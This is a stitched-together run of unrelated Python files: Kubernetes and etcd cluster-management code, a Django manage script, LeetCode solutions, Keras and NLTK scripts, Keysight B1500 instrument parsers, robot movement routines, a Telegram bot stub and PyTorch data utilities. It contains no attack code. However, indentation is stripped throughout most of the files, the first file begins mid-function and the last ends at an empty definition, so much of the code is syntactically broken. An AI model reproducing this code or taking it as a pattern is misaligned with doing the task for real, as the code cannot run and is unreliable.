for k, val in data.items():
data[k] = base64.b64encode(val.encode()).decode()
sec = k8sclient.V1Secret(data=data)
sec.metadata = k8sclient.V1ObjectMeta(
**{'name': 'bootstrap-token-%s' % tid, 'namespace': 'kube-system'})
sec.type = 'bootstrap.kubernetes.io/token'
self.api.create_namespaced_secret(namespace="kube-system", body=sec)
return ".".join((tid, token_secret))
@property
def host(self):
"""Retrieve the host or loadbalancer info"""
return self.api.api_client.configuration.host
@property
def ca_info(self):
"""Return a dict with the read ca and the discovery hash"""
return {"ca_cert": self.ca_cert, "discovery_hash": self.discovery_hash}
@property
def ca_cert(self):
"""Returns the API servers CA.
Returns:
The CA encoded as base64.
"""
return read_cert(self.api.api_client.configuration.ssl_ca_cert)
@property
def discovery_hash(self):
"""Calculate and return a discovery_hash.
Based on the cluster CA.
Returns:
A discovery hash encoded in Hex.
"""
return ssl_discovery_hash(self.ca_cert)
@property
def is_ready(self):
"""Check if the API server is already available.
Returns:
True if it's reachable.
"""
logging.getLogger("urllib3").setLevel(logging.ERROR)
try:
k8sclient.apis.core_api.CoreApi().get_api_versions()
logging.getLogger("urllib3").setLevel(logging.WARNING)
return True
except urllib3.exceptions.MaxRetryError:
logging.getLogger("urllib3").setLevel(logging.WARNING)
return False
def get_random_master(self):
"""Returns a name and IP of a random master server in the cluster.
Returns:
Tuple of name and IP of a master.
"""
nodes = self.api.list_node(pretty=True)
nodes = [node for node in nodes.items if
'node-role.kubernetes.io/master' in node.metadata.labels]
addresses = nodes[0].status.addresses
# master_ip and master_name are the hostname and IP of an existing
# master, where an etcd instance is already running.
master_ip = _get_node_addr(addresses, "InternalIP")
master_name = _get_node_addr(addresses, "Hostname")
return master_name, master_ip
@retry(ValueError)
def etcd_cluster_status(self):
"""Checks the current etcd cluster state.
This function calls etcdctl inside a pod in order to obtain the
current state of the etcd cluster before a new member can be added
to it.
Right now, etcdctl offers no convenient way to format the output so
the URLs from the masters can be extracted, which is why jq is used here.
Args:
podname (str): The name of the pod where the etcdctl command
should be sent from. Needs to be inside the kube-system namespace.
master_ip (str)
Returns:
The status of the etcd as a string
(e.g.master-1=192.168.1.102,master-2=192.168.1.103)
"""
name, master_ip = self.get_random_master()
exec_command = ['/bin/sh', '-c', ETCDCTL_BASE.format(
"member list", master_ip)]
response = stream(self.api.connect_get_namespaced_pod_exec,
"etcd-%s" % name, 'kube-system',
command=exec_command,
stderr=True, stdin=False,
stdout=True, tty=False)
if not response or not re.search("master-\\d+", response):
LOGGER.info(response)
raise ValueError("Could not extract current etcd cluster state!")
        # response should be something like
        # {'members': [{'ID': 9007573287841766007, 'name': 'master-7-am',
        # 'peerURLs': ['https://10.32.192.11:2380'],
        # 'clientURLs': ['https://10.32.192.11:2379']}]}
        response = yaml.safe_load(response)
etcd_cluster = ",".join(("=".join((m['name'], m['peerURLs'][0])) for m
in response['members'] if 'name' in m))
LOGGER.debug("Current etcd cluster state is: %s", etcd_cluster)
return etcd_cluster
def add_all_masters_to_loadbalancer(self, cluster_name, n_masters, lb_inst):
"""Adds all master nodes to the LoadBalancer listener.
If the number of members in the master listener pool of the LoadBalancer
is less than expected number of masters this function will add them to
the pool as soon as they have node status "Ready".
Args:
cluster_name (string): the name of the cluster
n_master (int): Number of desired master nodes.
lb_inst (:class:`.cloud.openstack.LoadBalancer`):
A configured LoadBalancer instance.
"""
cond = {'Ready': 'True'}
master_listener = lb_inst.master_listener
listener_name = '-'.join((MASTER_LISTENER_NAME,
cluster_name))
if not master_listener:
LOGGER.error(f"No {listener_name} found, aborting")
sys.exit(1)
try:
listener_name = master_listener['name']
mem = master_listener['pool']['members'] # noqa # pylint: disable=unused-variable
pool_id = master_listener['pool']['id']
except KeyError as exc:
LOGGER.error(f"Unable to extract info of {listener_name}: {exc}")
sys.exit(1)
while len(lb_inst.master_listener['pool']['members']) < n_masters:
for item in self.api.list_node(pretty=True).items:
if cond in [{c.type: c.status} for c in item.status.conditions]:
if 'master' in item.metadata.name:
addr_to_add = item.status.addresses[0].address
addr_present = [x['address'] for x in
lb_inst.master_listener['pool']['members']]
if addr_to_add not in addr_present:
LOGGER.debug("Adding %s to pool '%s' (%s) ...", addr_to_add,
listener_name, pool_id)
lb_inst.add_member(pool_id,
addr_to_add)
def apply_addons(self, koris_config, apply_func=create_from_yaml):
"""apply all addons to the cluster
Args:
koris_config (dict): koris configuration loaded as dict
"""
for addon in get_addons(koris_config):
LOGGER.info("Applying add-on [%s]", addon.name)
addon.apply(self.client, apply_func=apply_func)
@property
def nginx_ingress_ports(self):
"""
get the ingress-nginx service ports as dictionary
"""
ingress = self.api.list_namespaced_service(
'ingress-nginx',
label_selector="app.kubernetes.io/name=ingress-nginx",
limit=1)
return {i.name.upper(): i for i in ingress.items[0].spec.ports}
def validate_context(self, conn):
"""Validate that server that we are talking to via K8S API
is also the cloud context we are using.
This retrieves the project ID of the Kubernetes LoadBalancer,
then checks if it finds the same ID in any LoadBalancer of the
currently sourced OpenStack project.
In case the IP is not a Floating IP but only a Virtual IP, both
IPs are simply compared.
Args:
conn (obj): OpenStack connection object.
Return:
bool
"""
raw_ip = self.host.strip("https://").split(":")[0]
lb_ip = conn.network.find_ip(raw_ip)
if lb_ip:
# We have a Floating IP
for item in conn.load_balancer.load_balancers():
if item.project_id == lb_ip.project_id:
return True
else:
# We have a Virtual IP
for item in conn.load_balancer.load_balancers():
if item.vip_address == raw_ip:
return True
return False
class K8SScaler: # pylint: disable=no-member
"""
A Mixin to modify the cluster size
"""
def add_node(self):
"""add a node to the cluster"""
def add_master(self):
"""add a master to the cluster"""
def drain_node(self, nodename, ignore_not_found=True):
"""Drains a node of pods.
We're using ``kubectl drain`` instead of the eviction API, since it's
quicker and we don't have to get all the Pods of the Node first.
Will check if the node exists first.
Args:
nodename (str): Name of the node to drain
ignore_not_found (bool): If set to False, will raise
a ValueError if the node doesn't exist.
Raises:
RuntimeError if ``kubectl drain`` fails.
"""
if self.node_status(nodename) is None:
msg = f"Node {nodename} doesn't exist"
if ignore_not_found:
LOGGER.info("Skipping node eviction, %s", msg)
return
raise ValueError(msg)
# kubectl drain needs to block
cmd = ["kubectl", "drain", nodename, "--ignore-daemonsets"]
try:
proc = sp.run(cmd,
check=True,
encoding="utf-8",
stdout=sp.PIPE,
stderr=sp.PIPE)
except sp.CalledProcessError as exc:
            raise RuntimeError("error calling '%s': %s" % (" ".join(cmd), exc))
LOGGER.debug("STDOUT: %s (Exit code %s)", proc.stdout,
proc.returncode)
# pylint: disable=too-many-function-args
def delete_node(self, nodename, grace_period=0, ignore_not_found=True):
"""Delete a node in Kubernetes.
Args:
nodename (str): The name of the node to delete.
grace_period (int): Duration in seconds before the node should be
delete. Defaults to 0, which means immediately.
ignore_not_found (bool): If set to False, will raise a ValueError if
node doesn't exist.
Raises:
:class:`kubernetes.client.rest.ApiException` in case the API call
fails.
"""
if self.node_status(nodename) is None:
msg = f"Node {nodename} doesn't exist"
if ignore_not_found:
LOGGER.info("Skipping node eviction, %s", msg)
return
raise ValueError(msg)
resp = self.api.delete_node(nodename, grace_period_seconds=grace_period,
pretty=True)
LOGGER.debug(resp)
LOGGER.success("Kubernetes node '%s' has been deleted successfully",
nodename)
def node_status(self, nodename):
"""Returns the status of a Node.
Args:
nodename (str): The name of the node to check.
Returns:
The status of the node as string or None if an error was
encountered.
"""
resp = None
try:
resp = self.api.read_node_status(
nodename,
pretty=True)
LOGGER.debug("API Response: %s", resp)
except ApiException as exc:
LOGGER.debug("API exception: %s", exc)
return None
# Grab dat string
status = [x for x in resp.status.conditions if x.type == 'Ready']
return status[0].status
@retry(ValueError)
def etcd_members(self, podname, master_ip):
"""Retrieves a dictionary with information about the etcd cluster.
This function uses ``etcdctl member list`` to retrieve information
about the etcd cluster, then parses that response into a dictionary
where the keys are the names of the members and the corresponding values
hold the rest of the information such as ID, clientURLs and peerURLs.
Returns:
A dictionary with information about the etcd cluster.
Raises:
ValueError if master_ip is not valid.
"""
if not valid_ipv4(master_ip):
raise ValueError(f"Invalid IP: {master_ip}")
exec_command = ['/bin/sh', '-c', ETCDCTL_BASE.format(
"member list", master_ip)]
response = stream(self.api.connect_get_namespaced_pod_exec,
podname, 'kube-system',
command=exec_command,
stderr=True, stdin=False,
stdout=True, tty=False)
return parse_etcd_response(response)
@retry(ValueError)
def remove_from_etcd(self, name, ignore_not_found=True):
"""Removes a member from etcd.
The 'master-adder' operator will be used to perform the
queries against etcd. The pod will be created if not found.
Args:
name (str): The name of the member to remove.
ignore_not_found (bool): If set to False, will raise a
ValueError if member is not part of etcd cluster.
"""
master, master_ip = self.get_random_master()
podname = "etcd-%s" % master
etcd_members = self.etcd_members(podname, master_ip)
LOGGER.debug(etcd_members)
try:
etcd_id = etcd_members[name]['ID']
except KeyError:
msg = f"'{name}' not part of etcd cluster"
if ignore_not_found:
LOGGER.info("Skipping removing %s from etcd: %s", name, msg)
return
raise ValueError(msg)
exec_command = ['/bin/sh', '-c',
ETCDCTL_BASE.format("member remove %s" % etcd_id, master_ip)]
response = stream(self.api.connect_get_namespaced_pod_exec,
podname, 'kube-system',
command=exec_command,
stderr=True, stdin=False,
stdout=True, tty=False)
LOGGER.debug("%s", response)
LOGGER.debug("Removed '%s' from etcd", name)
class K8S(K8SConfigurator, K8SScaler): # pylint: disable=too-many-locals
"""Class allowing various interactions with a Kubernets cluster.
"""
def __init__(self, config, manifest_path=None):
"""
A class to configure k8s after boot
Args:
config (str): File path for the kubernetes configuration file
manfiest_path (str): Path for kubernetes manifests to be applied
"""
self.config = config
if not manifest_path:
manifest_path = MANIFESTSPATH
self.manifest_path = manifest_path
kube_config.load_kube_config(config_file=config)
config = Configuration()
self.api = k8sclient.CoreV1Api()
self.client = api_client.ApiClient(configuration=config)
@property
def nginx_ingress_ports(self):
"""
get the ingress-nginx service ports as dictionary
"""
ingress = self.api.list_namespaced_service(
'ingress-nginx',
label_selector="app.kubernetes.io/name=ingress-nginx",
limit=1)
return {i.name.upper(): i for i in ingress.items[0].spec.ports}
def get_addons(config):
"""
A prototype for loading addons. There are optional addons, and non-optional
addons.
    Currently, the non-optional addons are metrics-server, nginx-ingress and ext-cloud-openstack.
Args:
config (dict): parse yaml with an optional section, list of addons
"""
for item in config.get('addons', {}):
yield KorisAddon(item)
for item in ['metrics-server', 'nginx-ingress', 'ext-cloud-openstack']:
yield KorisAddon(item)
class KorisAddon: # pylint: disable=too-few-public-methods
"""
Naive Addon class. Applies a kubernetes collection of resources from yml.
Args:
name (str): the name of the plugin
manifest_path (str): the path where kubernetes resources are saved.
"""
def __init__(self, name, manifest_path=MANIFESTSPATH):
self.name = name
self.file = os.path.join(manifest_path, name + ".yml")
def apply(self, k8s_client, apply_func=create_from_yaml):
"""
Apply a plugin to the cluster.
Currently we use the Python client to apply a plugin. This might be
        limited, so we keep the possibility to use a kubectl shell wrapper by
making this an optional argument.
Args:
k8s_client: A Kubernet API client
apply_func: A callable that can apply a plugin to the cluster
"""
apply_func(k8s_client, self.file, verbose=False)
def add_ingress_listeners(nginx_ingress_ports, lbinst, lb_masters):
"""
Reconfigure the Openstack LoadBalancer - add an HTTP and HTTPS listener
for nginx ingress controller
Args:
lbinst (:class:`.cloud.openstack.LoadBalancer`): A configured
LoadBalancer instance.
        members (list): list containing member information
"""
# [{"name": "foo", "address": "10.0.0.38", "protocol_port": "6443"},
# {"name": "bar", "address": "10.0.0.29", "protocol_port": "6443"},
# ]
for key, port in {'Ingress-HTTP': 80, 'Ingress-HTTPS': 443}.items():
protocol = key.split("-")[-1]
name = '-'.join((key, lbinst.config['cluster-name']))
listener = lbinst.add_listener(
name=name,
protocol=protocol,
protocol_port=port)
pool = lbinst.add_pool(listener.id, protocol=protocol, name=name)
updated_masters = lb_masters.copy()
for master in updated_masters:
master['protocol_port'] = nginx_ingress_ports[protocol].node_port
master["monitor_port"] = nginx_ingress_ports[protocol].node_port
if not lbinst.bulk_update_members(updated_masters, pool['id']):
LOGGER.debug("Bulk update failed, falling back to serial update")
for master in lb_masters:
lbinst.add_member(pool.id, master['address'],
protocol_port=nginx_ingress_ports[protocol].node_port) # noqa
|
#!c:\users\shahe\courses\profiles-rest-api\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
"""
Given two words (beginWord and endWord), and a dictionary's word list, find the length of shortest transformation sequence from beginWord to endWord, such that:
Only one letter can be changed at a time.
Each transformed word must exist in the word list.
Note:
Return 0 if there is no such transformation sequence.
All words have the same length.
All words contain only lowercase alphabetic characters.
You may assume no duplicates in the word list.
You may assume beginWord and endWord are non-empty and are not the same.
Example 1:
Input:
beginWord = "hit",
endWord = "cog",
wordList = ["hot","dot","dog","lot","log","cog"]
Output: 5
Explanation: As one shortest transformation is "hit" -> "hot" -> "dot" -> "dog" -> "cog",
return its length 5.
Example 2:
Input:
beginWord = "hit"
endWord = "cog"
wordList = ["hot","dot","dog","lot","log"]
Output: 0
Explanation: The endWord "cog" is not in wordList, therefore no possible transformation.
"""
import collections
from typing import List
class Solution:
def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:
def find_neighbors(curr, wordList):
for index in range(len(curr)):
for ch in 'abcdefghijklmnopqrstuvwxyz':
nextWord = curr[:index] + ch + curr[index+1:]
if nextWord in wordList:
yield nextWord
wordList = set(wordList)
if beginWord in wordList:
wordList.remove(beginWord)
if endWord not in wordList:
return 0
queue = collections.deque([[beginWord, 1]])
visited = set()
while queue:
curr, step = queue.popleft()
if curr == endWord:
return step
if curr != beginWord and curr not in wordList:
continue
if curr != beginWord:
wordList.remove(curr)
for neighbor in find_neighbors(curr, wordList):
queue.append((neighbor, step + 1))
return 0 |
import sys
import pandas as pd
from keras.preprocessing.text import Tokenizer
TABELA = sys.argv[1]
SEQCOL = 'sequence'
LABCOL = 'class'
# Declare tokenizer
tkz_seq = Tokenizer(num_words = None, split = ' ', char_level = True, lower = True)
tkz_lab = Tokenizer()
# Read file
df = pd.read_csv(TABELA)
sequencias = df[SEQCOL]
categorias = df[LABCOL]
# Tokenize sequences
tkz_seq.fit_on_texts(sequencias)
x_seq_arrays = tkz_seq.texts_to_sequences(sequencias)
vocab_size_seq = len(tkz_seq.word_index) + 1
#print(tkz_seq.word_counts)
#print(tkz_seq.word_index)
#print(tkz_seq.word_docs)
#print(tkz_seq.document_count)
#print(vocab_size_seq)
# Tokenize labels
tkz_lab.fit_on_texts(categorias)
toklabs = tkz_lab.texts_to_sequences(categorias)
vocab_size_lab = len(tkz_lab.word_index) + 1
#print(tkz_lab.word_counts)
#print(tkz_lab.word_index)
#print(tkz_lab.word_docs)
#print(tkz_lab.document_count)
#print(vocab_size_lab)
|
'''
Author: ZHAO Zinan
Created: 30-Oct-2018
136. Single Number
https://leetcode.com/problems/single-number/description/
'''
class Solution:
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
        result = 0
        for num in nums:
            result ^= num
        return result
# test
if __name__ == '__main__':
solution = Solution()
print(solution.singleNumber([2, 1, 2]))
print(solution.singleNumber([1, 2, 1, 2, 3]))
|
# -*- coding: utf-8 -*-
import sklearn
from nltk.classify.scikitlearn import SklearnClassifier
from sklearn.svm import SVC, LinearSVC, NuSVC
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
def buildClassifier_score(trainSet, devtestSet, classifier):
    #print devtestSet
    from nltk import compat
    dev, tag_dev = zip(*devtestSet)  # split the dev/test set (already featurized and labelled) into data and labels
    classifier = SklearnClassifier(classifier)  # use the scikit-learn interface provided by NLTK
    #x,y in list(compat.izip(*trainSet))
    classifier.train(trainSet)  # train the classifier
    #help('SklearnClassifier.batch_classify')
    pred = classifier.classify_many(dev)  # classify the dev/test data and return the predicted labels
    return accuracy_score(tag_dev, pred)  # compare the predictions with the gold labels and return the accuracy
def showEvalueResult(trainSet, devtestSet, classiferName, classiferFunc):
    print(classiferName + '`s accuracy is %f' % buildClassifier_score(trainSet, devtestSet, classiferFunc))
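# Illustrative usage sketch (added for clarity, not part of the original script):
# the tiny feature sets below are made-up, following NLTK's convention of
# (feature_dict, label) pairs; any of the classifiers listed in the string
# below can be passed in the same way.
def _demo_evaluate_classifiers():
    train_set = [({'good': True}, 'pos'), ({'bad': True}, 'neg'),
                 ({'great': True}, 'pos'), ({'awful': True}, 'neg')]
    devtest_set = [({'good': True}, 'pos'), ({'awful': True}, 'neg')]
    for name, clf in [('BernoulliNB', BernoulliNB()),
                      ('MultinomialNB', MultinomialNB()),
                      ('LogisticRegression', LogisticRegression()),
                      ('LinearSVC', LinearSVC())]:
        showEvalueResult(train_set, devtest_set, name, clf)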
"""
BernoulliNB()
MultinomialNB()
LogisticRegression()
SVC()
LinearSVC()
NuSVC()
""" |
import re
from typing import Optional, Tuple, TYPE_CHECKING, Dict, Union, cast
from typing_extensions import TypedDict
from collections import namedtuple
import numpy as np
from qcodes import InstrumentChannel
from .message_builder import MessageBuilder
from . import constants
from .constants import ModuleKind, SlotNr, MeasurementStatus, ChannelName
if TYPE_CHECKING:
from .KeysightB1500_base import KeysightB1500
_FMTResponse = namedtuple('FMTResponse', 'value status channel type')
class MeasurementNotTaken(Exception):
pass
def fmt_response_base_parser(raw_data_val: str) -> _FMTResponse:
"""
Parse the response from SPA for `FMT 1,0` format into a named tuple
with names, value (value of the data), status (Normal or with compliance
error such as C, T, V), channel (channel number of the output data such
as CH1,CH2), type (current 'I' or voltage 'V'). This parser is tested
for FMT1,0 and FMT1,1 response.
Args:
raw_data_val: Unparsed (raw) data for the instrument.
"""
values_separator = ','
data_val = []
data_status = []
data_channel = []
data_datatype = []
for str_value in raw_data_val.split(values_separator):
status = str_value[0]
channel_id = constants.ChannelName[str_value[1]].value
datatype = str_value[2]
value = float(str_value[3:])
data_val.append(value)
data_status.append(status)
data_channel.append(channel_id)
data_datatype.append(datatype)
data = _FMTResponse(data_val, data_status, data_channel, data_datatype)
return data
def parse_module_query_response(response: str) -> Dict[SlotNr, str]:
"""
Extract installed module information from the given string and return the
information as a dictionary.
Args:
response: Response str to `UNT? 0` query.
Returns:
Dictionary from slot numbers to model name strings.
"""
pattern = r";?(?P<model>\w+),(?P<revision>\d+)"
moduleinfo = re.findall(pattern, response)
return {
SlotNr(slot_nr): model
for slot_nr, (model, rev) in enumerate(moduleinfo, start=1)
if model != "0"
}
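# Hypothetical usage sketch (added for illustration): the response string below
# is a made-up `UNT? 0` reply with two installed modules and one empty slot;
# slots reporting model "0" are dropped by the parser above.
def _demo_parse_module_query_response() -> None:
    modules = parse_module_query_response("B1517A,0;B1520A,0;0,0")
    # Slot 1 -> 'B1517A', slot 2 -> 'B1520A'; the empty third slot is omitted.
    assert list(modules.values()) == ["B1517A", "B1520A"]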
# pattern to match dcv experiment
_pattern_lrn = re.compile(
r"(?P<status_dc>\w{1,3})(?P<chnr_dc>\w),(?P<voltage_dc>\d{1,3}.\d{1,4});"
r"(?P<status_ac>\w{1,3})(?P<chnr_ac>\w),(?P<voltage_ac>\d{1,3}.\d{1,4});"
r"(?P<status_fc>\w{1,2})(?P<chnr_fc>\w),(?P<frequency>\d{1,6}.\d{1,4})"
)
def parse_dcv_measurement_response(response: str) -> Dict[str, Union[str,
float]]:
"""
Extract status, channel number, value and accompanying metadata from
the string and return them as a dictionary.
Args:
response: Response str to lrn_query For the MFCMU.
"""
match = re.match(_pattern_lrn, response)
if match is None:
raise ValueError(f"{response!r} didn't match {_pattern_lrn!r} pattern")
dd = match.groupdict()
d = cast(Dict[str, Union[str, float]], dd)
return d
# Pattern to match the spot measurement response against
_pattern = re.compile(
r"((?P<status>\w)(?P<channel>\w)(?P<dtype>\w))?"
r"(?P<value>[+-]\d{1,3}\.\d{3,6}E[+-]\d{2})"
)
class SpotResponse(TypedDict):
value: float
status: MeasurementStatus
channel: ChannelName
dtype: str
def parse_spot_measurement_response(response: str) -> SpotResponse:
"""
Extract measured value and accompanying metadata from the string
and return them as a dictionary.
Args:
response: Response str to spot measurement query.
Returns:
Dictionary with measured value and associated metadata (e.g.
timestamp, channel number, etc.)
"""
match = re.match(_pattern, response)
if match is None:
raise ValueError(f"{response!r} didn't match {_pattern!r} pattern")
dd = match.groupdict()
d = SpotResponse(
value=_convert_to_nan_if_dummy_value(float(dd["value"])),
status=MeasurementStatus[dd["status"]],
channel=ChannelName[dd["channel"]],
dtype=dd["dtype"]
)
return d
_DCORRResponse = namedtuple('_DCORRResponse', 'mode primary secondary')
def parse_dcorr_query_response(response: str) -> _DCORRResponse:
"""
    Parse string response of ``DCORR?`` command into a named tuple of
:class:`constants.DCORR.Mode` and primary and secondary reference or
calibration values.
"""
mode, primary, secondary = response.split(',')
return _DCORRResponse(mode=constants.DCORR.Mode(int(mode)),
primary=float(primary),
secondary=float(secondary))
def fixed_negative_float(response: str) -> float:
"""
    Keysight sometimes responds with, for example, '-0.-1' as the output when
    you input '-0.1'. This function also converts such strings to float.
"""
if len(response.split('.')) > 2:
        raise ValueError('String must be of format `a` or `a.b`')
parts = response.split('.')
number = parts[0]
decimal = parts[1] if len(parts) > 1 else '0'
decimal = decimal.replace("-", "")
output = ".".join([number, decimal])
return float(output)
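# Small sanity-check sketch (added for illustration): shows how the quirky
# instrument response described in the docstring above is recovered as a
# regular float, and that well-formed inputs pass through unchanged.
def _demo_fixed_negative_float() -> None:
    assert fixed_negative_float("-0.-1") == -0.1
    assert fixed_negative_float("12.34") == 12.34
    assert fixed_negative_float("5") == 5.0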
_dcorr_labels_units_map = {
constants.DCORR.Mode.Cp_G: dict(
primary=dict(label='Cp', unit='F'),
secondary=dict(label='G', unit='S')
),
constants.DCORR.Mode.Ls_Rs: dict(
primary=dict(label='Ls', unit='H'),
secondary=dict(label='Rs', unit='Ω'))
}
def format_dcorr_response(r: _DCORRResponse) -> str:
"""
Format a given response tuple ``_DCORRResponse`` from
``DCORR?`` command as a human-readable string.
"""
labels_units = _dcorr_labels_units_map[r.mode]
primary = labels_units['primary']
secondary = labels_units['secondary']
result_str = \
f"Mode: {r.mode.name}, " \
f"Primary {primary['label']}: {r.primary} {primary['unit']}, " \
f"Secondary {secondary['label']}: {r.secondary} {secondary['unit']}"
return result_str
def get_name_label_unit_of_impedance_model(
mode: constants.IMP.MeasurementMode
) -> Tuple[Tuple[str, str], Tuple[str, str], Tuple[str, str]]:
params = mode.name.split('_')
param1 = params[0]
param2 = '_'.join(params[1:])
label = (constants.IMP.Name[param1].value,
constants.IMP.Name[param2].value)
unit = (constants.IMP.Unit[param1].value,
constants.IMP.Unit[param2].value)
name = (label[0].lower().replace(' ', '_'),
label[1].lower().replace(' ', '_'))
return name, label, unit
# TODO notes:
# - [ ] Instead of generating a Qcodes InstrumentChannel for each **module**,
# it might make more sense to generate one for each **channel**
def get_measurement_summary(status_array: np.ndarray) -> str:
unique_error_statuses = np.unique(status_array[status_array != "N"])
if len(unique_error_statuses) > 0:
summary = " ".join(
            constants.MeasurementStatus[err].name for err in
unique_error_statuses
)
else:
        summary = constants.MeasurementStatus["N"].name
return summary
def convert_dummy_val_to_nan(param: _FMTResponse):
"""
    Converts dummy values to NaN. The instrument may output the dummy value
    199.999E+99 if the measured data is over the measurement range, if the
    sweep measurement was aborted by the automatic stop function or power
    compliance, or if any other abort condition is detected. Dummy data
    199.999E+99 is returned for the data after the abort.
Args:
param: This must be of type named tuple _FMTResponse.
"""
for index, value in enumerate(param.value):
param.value[index] = _convert_to_nan_if_dummy_value(param.value[index])
def _convert_to_nan_if_dummy_value(value: float) -> float:
return float('nan') if value > 1e99 else value
class B1500Module(InstrumentChannel):
"""Base class for all modules of B1500 Parameter Analyzer
When subclassing,
- set ``MODULE_KIND`` attribute to the correct module kind
:class:`~.constants.ModuleKind` that the module is.
- populate ``channels`` attribute according to the number of
channels that the module has.
Args:
parent: Mainframe B1500 instance that this module belongs to
name: Name of the instrument instance to create. If `None`
(Default), then the name is autogenerated from the instrument
class.
slot_nr: Slot number of this module (not channel number)
"""
MODULE_KIND: ModuleKind
def __init__(self, parent: 'KeysightB1500', name: Optional[str], slot_nr,
**kwargs):
# self.channels will be populated in the concrete module subclasses
# because channel count is module specific
self.channels: Tuple
self.slot_nr = SlotNr(slot_nr)
if name is None:
number = len(parent.by_kind[self.MODULE_KIND]) + 1
name = self.MODULE_KIND.lower() + str(number)
super().__init__(parent=parent, name=name, **kwargs)
# Response parsing functions as static methods for user convenience
parse_spot_measurement_response = parse_spot_measurement_response
parse_module_query_response = parse_module_query_response
def enable_outputs(self):
"""
Enables all outputs of this module by closing the output relays of its
channels.
"""
# TODO This always enables all outputs of a module, which is maybe not
# desirable. (Also check the TODO item at the top about
        #  InstrumentChannel per Channel instead of per Module.)
msg = MessageBuilder().cn(self.channels).message
self.write(msg)
def disable_outputs(self):
"""
Disables all outputs of this module by opening the output relays of its
channels.
"""
# TODO See enable_output TODO item
msg = MessageBuilder().cl(self.channels).message
self.write(msg)
def is_enabled(self) -> bool:
"""
Check if channels of this module are enabled.
Returns:
`True` if *all* channels of this module are enabled. `False`,
otherwise.
"""
# TODO If a module has multiple channels, and only one is enabled, then
# this will return false, which is probably not desirable.
# Also check the TODO item at the top about InstrumentChannel per
# Channel instead of per Module.
msg = (MessageBuilder()
.lrn_query(constants.LRN.Type.OUTPUT_SWITCH)
.message
)
response = self.ask(msg)
activated_channels = re.sub(r"[^,\d]", "", response).split(",")
is_enabled = set(self.channels).issubset(
int(x) for x in activated_channels if x != ''
)
return is_enabled
def clear_timer_count(self) -> None:
"""
This command clears the timer count. This command is effective for
all measurement modes, regardless of the TSC setting. This command
is not effective for the 4 byte binary data output format
(FMT3 and FMT4).
"""
self.root_instrument.clear_timer_count(chnum=self.channels)
class StatusMixin:
def __init__(self) -> None:
self.param1 = _FMTResponse(None, None, None, None)
self.param2 = _FMTResponse(None, None, None, None)
self.names = tuple(['param1', 'param2'])
def status_summary(self) -> Dict[str, str]:
status_array_param1 = self.param1.status
status_array_param2 = self.param2.status
if status_array_param1 is None:
raise MeasurementNotTaken("First run_sweep to generate the data")
summary_param1 = get_measurement_summary(status_array_param1)
summary_param2 = get_measurement_summary(status_array_param2)
return_dict = {self.names[0]: summary_param1,
self.names[1]: summary_param2}
return return_dict
|
import numpy as np
import sys
sys.path.append(".")
from ai.action.movement.movements.basic import *
from ai.action.movement.movements.poweron import *
import ai.actionplanner
def main(mars, times=5):
rub_object(mars, times)
def rub_object(mars, times):
for i in range(times):
rand_speed_1 = get_rand_speed(0.3, 0.5)
mars.setHeadAngle(2, get_rand_angle(25), get_rand_speed(0.1, 0.3))
mars.setHeadAngle(1, get_rand_angle(-25), get_rand_speed(0.1, 0.3))
mars.setLegAngle(1, 1, 0, rand_speed_1)
mars.setLegAngle(2, 1, -10, rand_speed_1)
mars.setLegAngle(1, 2, -30, rand_speed_1)
mars.setLegAngle(2, 2, 10, rand_speed_1)
mars.setLegAngle(1, 3, 80, rand_speed_1)
mars.setLegAngle(2, 3, 10, rand_speed_1)
mars.setLegAngle(3, 1, 15, rand_speed_1)
mars.setLegAngle(3, 2, 20, rand_speed_1)
mars.setLegAngle(3, 3, -80, rand_speed_1)
mars.setLegAngle(4, 1, -15, rand_speed_1)
mars.setLegAngle(4, 2, 20, rand_speed_1)
mars.setLegAngle(4, 3, -70, rand_speed_1)
ai.actionplanner.ActionPlanner.sleep(2)
rand_speed_2 = get_rand_speed(0.3, 0.5)
mars.setHeadAngle(2, get_rand_angle(0), get_rand_speed(0.1, 0.3))
mars.setHeadAngle(1, get_rand_angle(25), get_rand_speed(0.1, 0.3))
mars.setLegAngle(1, 1, int(np.random.uniform(15, 21)), rand_speed_2)
mars.setLegAngle(2, 1, 0, rand_speed_2)
mars.setLegAngle(1, 2, int(np.random.uniform(10, 15)), rand_speed_2)
mars.setLegAngle(2, 2, 20, rand_speed_2)
mars.setLegAngle(1, 3, int(np.random.uniform(10, 15)), rand_speed_2)
mars.setLegAngle(2, 3, 20, rand_speed_2)
mars.setLegAngle(3, 1, 0, rand_speed_2)
mars.setLegAngle(3, 2, 40, rand_speed_2)
mars.setLegAngle(3, 3, -40, rand_speed_2)
mars.setLegAngle(4, 1, 15, rand_speed_2)
mars.setLegAngle(4, 2, 40, rand_speed_2)
mars.setLegAngle(4, 3, -40, rand_speed_2)
ai.actionplanner.ActionPlanner.sleep(2)
|
from sanic import Sanic, response
from app.bot import bot_register
# https://api.telegram.org/bot{your_bot_token}/setWebhook?url={your_vercel_domain_url}/api/bot
app = Sanic(__name__)
@app.route("/api/bot", strict_slashes=False)
async def bot(request):
return response.text("This endpoint is meant for bot and telegram communication.")
# TODO: verify that this webhook setup works as expected
# Register bot as Serverless
bot_register(True)
if __name__ == "__main__":
app.run(debug=True, auto_reload=True, host="0.0.0.0", port=3000)
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
"""
import collections
from dataclasses import dataclass
import gtn
import importlib.util
import logging
import numpy as np
import os
import struct
import sys
import time
import torch
def data_loader(dataset, config, world_rank=0, world_size=1):
num_samples = config["data"].get("num_samples", None)
if num_samples is not None:
logging.info(f"Using {num_samples} of {len(dataset)}.")
dataset = Subset(dataset, torch.randperm(len(dataset))[:num_samples])
return torch.utils.data.DataLoader(
dataset,
batch_sampler=BatchSortedSampler(
dataset, config["optim"]["batch_size"], world_rank, world_size
),
collate_fn=padding_collate,
num_workers=int(world_size > 1),
)
def module_from_file(module_name, file_path):
spec = importlib.util.spec_from_file_location(module_name, file_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
sys.modules[module_name] = module
return module
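# Usage sketch (added for illustration): load an arbitrary Python file as a
# module, e.g. a model or config definition.  The module name and path below
# are hypothetical.
def _demo_module_from_file():
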